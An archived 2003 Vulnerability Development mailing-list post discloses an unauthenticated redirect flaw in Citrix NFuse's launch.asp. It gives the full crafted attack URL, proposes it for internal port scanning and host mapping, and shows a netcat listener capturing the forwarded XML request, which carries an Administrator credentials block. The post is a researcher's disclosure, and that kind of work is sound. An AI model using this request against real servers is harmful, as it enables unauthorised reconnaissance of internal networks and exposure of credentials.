Vulnerability Development mailing list archives
lame citrix bug, anyone think of anything interesting?
From: "wirepair" <wirepair () roguemail net>
Date: Tue, 14 Oct 2003 07:34:25 -0700
lo again,Yeah I know I'm getting of tired of Citrix too. While messing around with NFuse I found out i can basically redirect to any port to any server. Using http://nfusehost/Citrix/launch.asp?NFuse_CitrixServer=ip.ip.ip.ip&NFuse_CitrixServerPort=9000&NFuse_Transport=HTTP&NFuse_Application=Weee&NFUSE_USER=Administrator&NFuse_MIMEExtension=.ica So I guess we could use this to do a port scan by guessing response time for ports. You could probably map the internal hosts for services and such. Its pretty weak but I guess it could help someone at sometime. Oh also you don't need to authenticate to use launch.asp...
The data it sends is: root@jebus:/home/fbi# nc -l -v -p 9000 listening on [any] 9000 ... connect to [my.ip.ip.ip] from (UNKNOWN) [nfuse.ip.ip.ip] 3939 POST /scripts/wpnbr.dll HTTP/1.1 Content-Type: text/xml Host: my.ip.ip.ip:9000 Content-Length: 1100 Connection: Keep-Alive <?xml version="1.0" encoding="UTF-16"?> <!DOCTYPE NFuseProtocol SYSTEM "NFuse.dtd"> <NFuseProtocol version="4.1"> <RequestAppData> <Scope traverse="onelevel"></Scope> <DesiredDetails>all</DesiredDetails> <AppName>Wee</AppName> <ServerType>all</ServerType> <ClientType>ica30</ClientType> <Credentials> <UserName>Administrator</UserName> <Password encoding="ctx1"></Password> <Domain type="NT"></Domain> </Credentials> </RequestAppData> </NFuseProtocol>Anyone else got some tricks you could possibly use this for? -wire
-- Visit Things From Another World for the best comics, movies, toys, collectibles and more. http://www.tfaw.com/?qt=wmf
Current thread:
- lame citrix bug, anyone think of anything interesting? wirepair (Oct 14)